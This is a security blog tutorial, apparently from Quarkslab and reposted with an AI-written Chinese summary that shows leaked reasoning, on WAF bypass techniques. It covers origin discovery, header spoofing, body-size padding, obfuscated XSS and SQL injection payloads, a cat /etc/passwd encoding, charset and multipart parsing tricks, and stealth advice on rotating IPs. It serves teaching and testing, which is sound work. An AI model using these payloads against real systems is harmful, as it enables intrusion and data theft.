In WAF we (should not) trust

In WAF we (should not) trust
嗯，用户让我帮忙总结一篇文章的内容，控制在100字以内，而且不需要特定的开头。首先，我需要理解这篇文章的主题。看起来是关于Web应用防火墙（WAF）的绕过方法，包括误配置利用、构造混淆载荷等。用户可能是一位网络安全专业人士，或者正在学习相关知识的学生。他们可能需要快速了解文章的主要内容，用于学习、工作或进一步研究。深层需求可能是希望掌握WAF绕过的基本方法和策略，以便在实际中应用或防御。接下来，我需要提取文章的关键点：WAF的工作原理、绕过技术如直接攻击原服务器、利用信任排除、请求体大小限制、以及各种混淆技术如字符编码、结构化混淆和协议混淆。此外，文章还提到了测试和验证的方法。最后，我需要用简洁的语言把这些要点整合起来，确保在100字以内，并且直接描述内容，不使用总结性的开头。 </think> 文章探讨了Web应用防火墙（WAF）的绕过技术，包括直接攻击原服务器、利用信任排除规则、请求体大小限制以及通过字符编码、结构化混淆和协议混淆等手段隐藏恶意载荷。文章还强调了WAF与后端解析差异带来的安全风险，并提供了测试和验证的步骤。 2026-3-25 23:0:0 Author: blog.quarkslab.com(查看原文) 阅读量:5 收藏

Deep dive into Web Application Firewall (WAF) bypasses, from misconfiguration exploitation to crafting obfuscated payloads. We show the impact of the parsing discrepancy between how a WAF reads a request and how a backend executes it. It is not a bug, it is a feature.

Introduction

You just finished configuring your brand new Web Application Firewall. You are now protected from attackers, or so you think. Maybe your applications have weaknesses, but the WAF has your back... Right?

Throughout this article, we will demonstrate different ways to bypass a WAF.

What is a WAF and How Does it Work?

Before we begin, let us review the basics of what is a WAF and how it works.

A Web Application Firewall (WAF) is a specific form of application firewall that filters, monitors, and blocks HTTP traffic to and from a web service. By inspecting HTTP traffic, it can prevent attacks exploiting known web application vulnerabilities such as SQL injection, XSS, file inclusion, and security misconfigurations. At its core, a WAF is a reverse proxy operating at the application layer (layer 7 of the OSI model). Every HTTP request passes through it before reaching the backend. Unlike network firewalls which operate on IP and port rules, a WAF understands the application layer. It reads HTTP headers, query parameters, cookies, and request bodies.

The following diagram describes the workflow of a request as it passes through a WAF:

Web Application Firewall (WAF) Workflow

To summarize, a WAF is a succession of filters:

Blacklist Check: Before inspecting anything, the WAF checks static lists of blocked IPs, user-agents, countries, or known malicious headers. If the sender matches any entry, the request is dropped immediately. No further processing occurs.
Penalty Box: Clients previously flagged for suspicious behavior by scanning patterns, brute force attempts, etc., are temporarily banned. This list is maintained dynamically and is based primarily on IP address and User-Agent. Once you land here, every subsequent request is blocked regardless of its content.
Rate Control: Too many requests in too short a time window triggers throttling, blocking, or a challenge (CAPTCHA). This layer protects against brute force and volumetric DDoS at the application layer.
Client Reputation: Dynamic scoring based on the sender's history. Known Tor nodes, botnets, flagged IPs, behavioral signals across the WAF's global network.
Parsing & Inspection: If the request survives the above layers, the WAF decodes it. URL encoding, body format, chunked transfer, compression, etc. and runs it through its ruleset. Three detection models are used:
- Signature-based: Regex patterns matched against known attack strings. The OWASP Core Rule Set (CRS) is the most widely deployed baseline, used by ModSecurity, Cloudflare, AWS WAF, and others.
- Anomaly scoring: Instead of blocking on a single match, the WAF accumulates a score across multiple partial matches. A request only gets blocked when the cumulative score exceeds a configured threshold. This reduces false positives while maintaining coverage.
- Custom rules: Defined by the operator are evaluated in this same phase, after the default ruleset.
Decision: If the request was not blocked by any previous layer, a final decision is made based on the accumulated score. Allow the request through to the origin, block it with a 403, challenge the client with a CAPTCHA or browser integrity check, or log it silently for review. The action depends on the WAF's configuration and the severity of the score.

The overall architecture is close enough to this one for all WAFs. Now, you know enough to be able to play with a WAF.

Knock Knock. Who's there ? Mis(s)config

When discussing WAF bypass techniques, the first ideas that usually come to mind are payload obfuscation, encoding tricks and fuzzing. While these techniques are widely documented and sometimes effective, they might not be the best in real-world scenarios.

Finding a payload that consistently bypasses detection requires a high number of requests, which generates:

Large volumes of suspicious requests.
Anomalous traffic patterns.
Elevated WAF logs and alerts.

From a defensive standpoint, these behaviors are easy to detect. From an offensive standpoint, they significantly increase the risk of early detection, IP blocking, or session invalidation.

So let's discuss some alternative techniques.

Direct Origin Exposure

Our first technique is the most straightforward. Instead of trying to bypass the WAF's rules, we just ignore it entirely. By directly targeting the origin server, every request reaches the application without ever passing through the WAF, nullifying all of its security protections and potential logging.

This exposure can occur for several reasons:

Historical DNS records still pointing to the origin IP.: Passive DNS databases continuously archive DNS resolutions over time, including records that predate a CDN or proxy setup. Querying these databases can reveal the original server IP, allowing an attacker to bypass the proxy and reach the origin directly.
Apex domain misrouting.: Organizations often proxy their www subdomain through a CDN but neglect the apex domain (example.com), which can end up resolving directly to the origin IP due to DNS provider limitations.
Infrastructure migrations leaving legacy endpoints accessible.: Old staging servers, deprecated load balancers, or previous hosting environments are frequently left live after a migration is considered complete. These forgotten endpoints sit outside any protective layer and directly expose the origin server.
Favicon hash leakage.: Shodan or Censys indexes favicon files across the internet using MurmurHash. An attacker can hash a target site's favicon and search Shodan for matching IPs, identifying the origin server even when it sits behind a CDN.
SPF records revealing internal infrastructure.: SPF records are public DNS entries that list all mail servers authorized to send on behalf of a domain. They often include internal hostnames or dedicated IP ranges that inadvertently expose details about the underlying infrastructure to anyone who queries them.

Useful resources to find the origin:

CloudFail enumerates historical DNS records and Cloudflare misconfigurations to surface IP addresses that predate a proxy setup.
Censys provides certificate and host intelligence that can be queried to find servers sharing a common domain name, for example using web.cert.parsed.subject.common_name:"target.com".
Shodan continuously scans the internet and indexes server banners and certificates, making it possible to search for exposed origin servers directly with queries like ssl.cert.subject.CN:"<DOMAIN>" 200.
Favicon hash consists of computing the MurmurHash of a target's favicon and searching Shodan or Censys for all hosts that returned the same hash, revealing the origin IP behind a CDN.
UnWAF is an all-in-one tool specifically designed for origin discovery behind WAFs, combining several of the above techniques into a single automated workflow.

This technique is becoming increasingly rare as misconfigurations get patched, but vulnerable endpoints can still be found in the wild. By injecting specific HTTP headers suggesting the request originates from a trusted internal source, some WAF configurations will whitelist it and skip inspection entirely.

Headers like X-Forwarded-For, X-Real-IP, X-Originating-IP or X-Custom-IP-Authorization are common targets. When a configuration blindly trusts these headers without validation, setting them to a loopback address (127.0.0.1) or an internal IP range (10.0.0.1, 192.168.0.1) can be enough to bypass the inspection pipeline.

You can find a list of potential host-spoofable HTTP headers from SeanPesce repository.

Request body Inspection Limit Size

For performance and reliability reasons, WAF appliances limit the maximum size of requests they analyze. As a result, by adding a large amount of junk data before the malicious payload to a request, the WAF may skip analyzing the request due to its size in order to conserve resources.

The request should look like:

POST / HTTP/2
Host: target.com
Content-Type: application/json
Content-Length: 8218

{"random_data":"65DA4f8f[..8_kB_data..]Xk8UP","value": "<payload>"}

Each WAF provider defines its own default size limits. The table below summarizes these limits.

WAF Provider	Maximum Request Body Inspection Size Limit
Cloudflare	128 KB for ruleset engine
AWS WAF	8 KB - 64 KB (configurable depending on service)
Akamai	8 KB - 32 KB
Azure WAF	128 KB - 2MB
Fortiweb by Fortinet	100 MB
Barracuda WAF	64 KB
Sucuri	10 MB
Radware AppWall	up to 1 GB for cloud WAF
F5 BIG-IP WAAP	20 MB (configurable)
Palo Alto	10 MB
Cloud Armor by Google	8 KB (can be increased to 64 KB)

This technique does not always work because it depends on how the application itself handles oversized request bodies. If the application rejects or truncates requests that exceed a certain size, the payload never reaches the backend and the attack fails.

A common real-world example is file upload functionality. Since legitimate users need to upload large files, WAFs are often configured with a higher size limit or a full exception for those endpoints. Furthermore, this attack only works with HTTP requests that include a body, such as POST, PUT, PATCH, etc.

ℹ️ Source

Assetnote's tool nowafpls helps to perform this attack.

Abusing Trust-Based Exclusions

Some WAF deployments implement exclusion or relaxation rules for traffic originating from well-known cloud providers or enterprise proxy networks.

This typically includes ASNs associated with:

Public cloud providers (AWS, Azure, GCP).
Corporate proxy solutions (e.g., Zscaler).
CDN or security service providers (e.g., Cloudflare).

These exclusions are often introduced for operational reasons rather than security considerations. For example, organizations may need to allow developers or internal users to access restricted application features while working behind enterprise proxy. In such cases, relying on individual IP whitelisting is impractical, leading maintainers to trust entire proxy ASNs to ensure uninterrupted access.

We can then try to proxify our requests through different cloud or proxy providers and compare WAF behavior for identical payload.

💡Tips

You can exploit this behavior by combining it with an SSRF or CSRF attack. With SSRF, you can force the target server to make a request through a trusted ASN, making the traffic appear legitimate to the WAF. With CSRF, you can trick a victim who is already behind a trusted corporate proxy like Zscaler into sending the malicious request, which will inherit the trusted ASN and bypass WAF inspection entirely.

Useful resources:

proxyblob: Proxify your traffic through Azure Storage services.
cdn-proxy: Proxy through AWS and/or Cloudflare.
IPSpinner: Pass-through proxy that rotates the source IP address of each request.

WAF has rules and we rule them all.

Before diving into specific attack types, it is important to understand the goal behind every bypass in this section.

WAFs operate on pattern recognition, they compare incoming requests against a library of known-bad signatures. Every technique here exploits the same fundamental gap: the WAF and the backend do not interpret the same request the same way.

The obfuscation methodology

Obfuscation is not a single technique, It is a layered strategy. The goal is not just to "encode a payload", it is to make the WAF see something harmless while the backend executes something dangerous.

There are three levels of obfuscation to consider:

Lexical obfuscation: You transform individual characters so the WAF does not recognize them. The dangerous string is still there, just in another shape.
Structural obfuscation: You alter the structure of the payload so it doesn't match known grammar patterns, while remaining valid to the parser or interpreter on the backend. The payload is assembled at runtime by the interpreter itself.
Protocol obfuscation: You manipulate the HTTP request itself so the WAF processes a different version of the request than the application does.

The problem, as covered in the previous part, is that this kind of bypass is heavy by nature. It generates a high volume of malicious requests and significantly increases detection rates.

To stay under the radar, a few mitigations can be applied:

Rate limiting your requests: Slow down your scan to avoid triggering the WAF's rate control and penalty box mechanisms.
Rotating user-agents and headers: Randomizing your HTTP fingerprint makes behavioral profiling harder. Tools like fake-useragent or custom wordlists help here.
Rotating IPs across different ASNs: Using exit nodes spread across major cloud providers (AWS, Azure, Cloudflare) makes IP-based reputation blocking ineffective. Tools like ip-rotator, ProxyBlob or IPSpinner are practical options for this.

None of these guarantees complete invisibility but combined, they make the difference between a scan that gets blocked in the first hundred requests and one that completes.

Lexical Obfuscation

Basic manipulation

Case mixing

This is the first technique and the simplest one. HTTP and SQL are not case-sensitive by specification. This technique involves manipulating the characters in the payload by switching letters from uppercase to lowercase.

sElEcT, UnIoN, aLeRt, oNlOaD, sCrIpT

Although it does nothing on its own, it contributes to the overall obfuscation of the payload.

Comment injection

Every major language supports comments. WAFs may look for keywords as contiguous token sequences. By inserting a comment between them, the tokens are no longer contiguous, causing the WAF’s pattern to fail to match. The backend, however, strips the comment before execution and processes the full keyword normally.

UN/**/ION SE/**/LECT 1,2,3
<scr<!---->ipt>alert(1)</scr<!---->ipt>

Whitespace substitution

Spaces are not the only whitespace. HTTP supports several characters that count as spaces but may not be normalized by the WAF before matching. These characters can be used instead of classic whitespace in order to trick the waf:

%09 -> horizontal tab
%0a -> newline
%0d -> carriage return
%0b -> vertical tab
%a0 -> non-breaking space

Encoding

Encoding is where lexical obfuscation starts getting powerful.

Char encoding

Characters encoding is the most common starting point. Let us start with urlencode. This encoding method is almost always normalized by the WAF. Double urlencoding add a second layer and allows the payload to be decoded once by the WAF but then passed to the back-end in a state.

%25%32%66 -> %2f -> /   
double urlencode -> simple urlencode -> character

Following, unicode escape works by representing any character as \uXXXX in JavaScript. A WAF signature looking for confirm will not match co\u006efirm.

\u006e = n → co\u006efirm = confirm 
\u0027 = ' → useful for quote bypasses 
\u003c = < → useful for HTML injection

Finally, octal encoding and hex encoding work in the same way. Supported natively in JavaScript and some Unix systems. Octal simply represent character codes in base 8, while hex encoding represents characters as their hexadecimal byte values.

**Octal Encoding**
\141\154\145\162\164\50\61\51 -> alert(1)

cat $'\x2f\145\164\143\x2f\160\141\163\163\167\144' -> cat /etc/passwd (Unix context)

**Hex Encoding**
\x61\x6c\x65\x72\x74\x28\x31\x29 -> alert(1)

cat $'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64' -> cat /etc/passwd

JS encode

Two notable methods for JavaScript obfuscation are known, JSFuck and JJEncode. There are others, but we will focus on these two. First, JSFuck rewrites any JavaScript expression using only six characters: the square brackets, parentheses, exclamation mark, and plus sign. It works by exploiting JavaScript's type coercion system. JJencode follows the same philosophy but uses a dollar sign and underscore based reduced charset built around a reference variable. These changes allow for shorter payloads.

# JSFuck -> eval(alert(1))
[][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[+!+[]]]+[+!+[]]+([]+[]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[!+[]+!+[]]])()

# JJEncode -> execute alert(1)
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\""+$.__$+"\\\"\\"+$.$__+$.___+")"+"\"")())();

This type of encoding is easily identifiable by its length but also by entropy analysis. To use this type of encoding effectively, we must only encode dangerous token and leave the rest to other techniques.

Structural Obfuscation

String splitting

The principle is simple: never send the blocked string whole. Split it at the token level and let the interpreter reassemble it at runtime.

The most explicit form of this technique is to assign each character of the blocked word to its own variable, then concatenate them into a working call. An XSS payload might look like this:

a="a"; b="l"; c="e"; d="r"; e="t";
f="("; g="1"; h=")";

eval(a+b+c+d+e+f+g+h)   // eval("alert(1)")

In JavaScript, a sink is any function or property that can execute or interpret code dynamically. Using an alternative execution sink is mandatory to avoid detection. The obvious ones like eval() and Function() are heavily flagged. The goal is to find a sink that is either unknown to the WAF or disguised enough to pass inspection.

Accessing Function through the constructor chain. The keyword Function never appears, you navigate JavaScript's prototype chain to reach the same constructor.

[]["con"+"structor"]["con"+"structor"]("ale"+"rt(1)")()
(()=>{})["con"+"structor"]("ale"+"rt(1)")()

Using setTimeout and setInterval, both accept a string and evaluate it, but are far less scrutinized by WAF rules

setTimeout("ale"+"rt(1)")
setInterval("ale"+"rt(1)", 99999)

Using location as a sink via the javascript:

location="java"+"script:ale"+"rt(1)"

Using document.write with atob, the raw payload never appears in the request, the browser decodes and renders it at runtime.

document.write(atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="))
// decodes from base64 to <script>alert(1)</script>

Executing JavaScript through HTML without a script tag. The <script> tag is the most obvious and most blocked vector. The browser offers dozens of ways to execute JavaScript through pure HTML that WAFs either do not monitor or associate with code execution.

<img src=x onerror=alert(1)>
<input autofocus onfocus=alert(1)>
<details ontoggle=alert(1) open>
<svg onload=alert(1)>
<svg><animate onbegin=alert(1) attributeName=x>
<marquee onstart=alert(1)>
<a href="javascript:alert(1)" autofocus onfocus=this.click()>x</a>
<iframe src="javascript:alert(1)">

ℹ️ Further readings

Find many more execution sink vectors following these links:

PortSwigger Cheat Sheet.

Paracyberbellum.

PayloadAllTheThings.

Parameter pollution

HTTP Parameter Pollution (HPP) exploits a fundamental parsing gap between the WAF and the backend. When a request contains multiple parameters sharing the same name, the WAF inspects each one individually and sees nothing malicious.

However, the effectiveness of this technique depends heavily on how the backend framework handles duplicate parameters. Frameworks like ASP.NET, ASP, and Node.js concatenate them into a single value, which is the behavior that makes HPP exploitable. Others like PHP only keep the last occurrence, Flask and Django keep the first, while Python Zope and Golang return an array. Understanding the target framework's parsing behavior is therefore essential before attempting this technique.

This section is taken from Bruno Mendes' article.

How frameworks handle duplicate parameters:

Framework	Input	Output
ASP.NET	param=val1&param=val2	param=val1,val
ASP	param=val1&param=val2	param=val1,val2
Node.js	param=val1&param=val2	param=val1,val2
Python - Zope	param=val1&param=val2	param=['val1','val2']
Golang net/http	param=val1&param=val2	param=['val1','val2']
PHP	param=val1&param=val2	param=val2 (last wins)
Flask / Django	param=val1&param=val2	param=val1 (first wins)

As we can see some frameworks concatenate the two values into one parameter. We can imagine a payload like /?q=1'&q=alert(1)&q='2 which for example ASP.NET reassembles into userInput = '1',alert(1),'2'.

Combined with string splitting it become powerful bypassing tool.

Putting payloads into practice

As mentioned above, each technique individually will have difficulty bypassing any WAF. But this is where you need to be creative: an attacker needs to combine all these techniques into a single payload. That is what we call a polymorphic payload: the same payload can be written in different ways.

The following is an example of a XSS polymorphic payload:

<SvG/onfake="x=54Ur0N"oNlOaD=;1^(\u0061\u006c\u0065\u0072\u0074)``^1//

Where:

Component	Technique	Why
SvG	Mixed case tag	lowering signature matching
onfake="x=54Ur0N"	Fake attribute with leet value	Confuses the parser so it misidentifies the real event handler
oNlOaD	Mixed case real event handler	Same as the tag
;	Statement separator	Breaks the expression so it doesn't look like a single executable statement
1^(...)^1	XOR wrapping	Makes the function call look like arithmetic, the call is just a side effect
\u0061\u006c\u0065\u0072\u0074	Full unicode encoding of alert	The word alert never appears anywhere in the raw request
``	Backtick invocation	Calls the function without parentheses
//	JS comment	Neutralizes anything the application appends after the injection point

Moreover, SQL injection is a good fit for polymorphic construction. Here is a UNION-based injection payload that combines five techniques simultaneously:

'%0auNiOn/**/sElEcT CHAR(118,101,114,115,105,111,110),CONCAT(0x7e,database(),0x7e),3--+

Where:

Component	Technique	Why
%0a	Newline as whitespace	Breaks UNION, whitespace regex fails
uNiOn	Mixed case	UNION keyword never appears in its expected form
/**/	Comment injection	Separates tokens so contiguous keyword detection fails
sElEcT	Mixed case	Same as above for SELECT
CHAR(118,101,114,115,105,111,110)	CHAR() reconstruction	The string version never appears; it's assembled by the DB at runtime
CONCAT(0x7e,database(),0x7e)	Hex literal + function	0x7e is the tilde ~ as a hex literal, no string delimiters needed
--+	Comment + URL-safe terminator	Truncates the rest of the query cleanly

Even if these payloads no longer work for some WAFs, the techniques used can allow the generation of other payloads.

Protocol Obfuscation

These attacks keep the malicious payload completely unmodified. Instead, they mutate the protocol structure leading to parsing discrepancies. Parsing discrepancies have been known as a critical security weakness since at least 1998 and have been studied academically for quite some time. In our scenario, the WAF misreads the structure and skips the payload, while the backend framework parses it correctly and executes the attack.

Charset switching

This technique was first presented by Soroush Dalili at SteelCon and BSides Manchester 2017, under the title "A Forgotten HTTP Invisibility Cloak".

The core idea is that the Content-Type header in an HTTP request can declare a character encoding for the request body. Normally this is UTF-8. But nothing stops you from declaring something else. The backend, handles many of these encodings natively and decodes the body correctly before passing it to the application. However, WAF's, depending on the vendor, may have their entire signature-based in UTF-8 and so they fail to analyse our request.

We will use IBM037 encoding, but many others are compatible, particularly with IIS servers. You can generate the encoded payload in Python:

import urllib.parse
payload = "'union all select * from users--"
print(urllib.parse.quote_plus(payload.encode("IBM037")))

The final request should look like:

POST /vulnerable.aspx HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=ibm037

%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60

ℹ️ Further reading

The original work can be found here

Research published by PortSwigger (Zakhar Fedotkin, December 2024) demonstrates how the legacy RFC2109 cookie standard can be abused to bypass WAF inspection. By prepending $Version=1 to a Cookie header, some servers switch to a legacy parsing mode that supports quoted string values. Inside these quoted strings, special characters like semicolons, newlines, and backslashes can be octal-encoded, effectively hiding malicious payloads from WAF signature matching.

For example, on servers running Apache Tomcat or Python-based frameworks, the following bypasses WAF detection:

# Simple XSS payload
Cookie: $Version=1; param="\e\v\a\l\(\'\t\e\s\t\'\)"

# Same payload but encoded in octal
Cookie: $Version=1; q="\145\166\141\154\050\047\141\154\145\162\164\050\061\051\047\051"

ℹ️ Further reading

The full research is available here

WAAFLED, the multipart request splitting

The WAFFLED study (2024) exploits content-type parsing discrepancies across major WAFs. The core finding is that WAFs and backend frameworks frequently disagree on how to parse the same HTTP request body when it uses a non-standard or mixed content type.

The attack surface is multipart/form-data. When a payload is split across multiple parts, WAFs inspecting each part independently never see a complete signature. The backend reassembles all parts before execution.

The WAFFLED research goes further, identifies three deeper discrepancy classes.

Boundary confusion

The boundary value is user-controlled. A crafted boundary containing quotes or semicolons causes some WAF parsers to misidentify where parts begin and end, while the backend parser handles it correctly.

POST /search HTTP/1.1
Content-Type: multipart/form-data; boundary="----Boundary; boundary=legit"

------Boundary; boundary=legit
Content-Disposition: form-data; name="input"

' UNION SELECT 1,2,3--
------Boundary; boundary=legit--

The WAF interprets the boundary as legit due to the injected semicolon, fails to locate the actual part boundaries, and skips inspection. The backend uses the full boundary string and parses the body correctly.

Content-type stacking

Nesting a multipart/mixed block inside a multipart/form-data body creates a two-level structure that most WAFs do not recursively inspect. The payload lives in the inner layer, invisible to a WAF that only parses the outer envelope.

POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=--OuterBoundary

----OuterBoundary
Content-Disposition: form-data; name="file"
Content-Type: multipart/mixed; boundary=--InnerBoundary

----InnerBoundary
Content-Disposition: attachment; filename="data.txt"

' UNION SELECT 1,2,3--
----InnerBoundary--
----OuterBoundary--

The WAF inspects the outer part and sees a file upload. The backend recursively parses the inner multipart block and passes the payload to the application.

Chunked + multipart combination

Wrapping a multipart body inside a chunked transfer request forces the WAF to handle two reassembly mechanisms simultaneously. Most WAFs manage one correctly. Both together is a challenge many fail.

POST /search HTTP/1.1
Content-Type: multipart/form-data; boundary=----Boundary
Transfer-Encoding: chunked

1F
------Boundary
Content-Disposition:
1A
 form-data; name="q"

10
' UNION SELECT
D
 1,2,3--
0

------Boundary--

The WAF would need to first reassemble the chunked body, then parse the resulting multipart structure, then inspect the reconstructed field value. A three-step process that many production WAF deployments fail to complete correctly.

ℹ️ Further reading

The full WAFFLED paper is available here

The Playbook

Methodology matters more than any individual technique. Here is the repeatable workflow behind every successful bypass in this article.

1. Fingerprint: Identify the WAF using wafw00f or others tools, response headers, error page signatures, and timing behavior. Knowing the vendor narrows down which rulesets and detection paradigms are in play.

2. Probe: Find an attack vector and send known-bad payloads. Map which ones get blocked, which pass through, and what response codes you get (403, 406, 503). You are building a picture of the ruleset's coverage.

3. Try misconfigurations first: Before touching the ruleset, go back to Misconfiguration part. Look for direct origin exposure, header spoofing, trust-based exclusions, request body inspection limit size. A misconfiguration bypass costs nothing and leaves no obfuscation traces.

4. Search before you craft: Before spending time building a custom payload, check if someone has already done it. WAF bypasses are frequently shared publicly on social media, bug bounty write-ups, and research blogs. Following a useful Google dork:

"<WAF name>" "bypass" "payload" site:github.com OR site:medium.com OR site:hackerone.com OR site:twitter.com

Make your own.

5. Isolate: If no misconfiguration applies, strip the blocked payload down to its minimum. Remove characters one by one until you find the exact token or string causing the block. Is it UNION? SELECT? The quote character? The combination? Knowing the exact trigger is everything.

6. Obfuscate: Apply the appropriate technique to that specific token. Fragment it with comments or concatenation. Encode it. Reconstruct it from char codes. The technique depends on the context.

7. Layer: Add a second and third obfuscation layer on top. Case variation on another keyword. Whitespace substitution on the separator. Unicode escape on a character inside the encoded token. Each layer plugs the gaps left by the others.

8. Validate: Confirm the payload actually executes on the backend. Check for behavioral indicators: query results, reflected output, triggered callbacks.

9. Iterate: If blocked again, return to step 4. The loop is the methodology.

The following diagram describes the methodology to find a valid WAF bypass:

WAF Bypass Methodology Workflow

Conclusion

Even if payload obfuscation is not the most stealth technique, it remains the most versatile one. Unlike misconfigurations, it is not tied to a specific target or deployment. If you want a quick win, misconfiguration and protocol-level attacks will always be the better first move. But when those do not apply, crafting and obfuscating your payload is the last reliable path forward.

Every bypass in this article follows the same principle, the WAF and the backend do not speak the same language, and that gap is fundamental to how the modern web works. The hardest truth is that every bypass is only possible because the underlying application is vulnerable. A WAF is just a bandage on insecure code, never a substitute for secure development.

Don't trust your WAF blindly. Test it. Break it. And then fix what's behind it.

If you would like to learn more about our security audits and explore how we can help you, get in touch with us!

文章来源: http://blog.quarkslab.com/in-waf-we-should-not-trust.html
如有侵权请联系:admin#unsafe.sh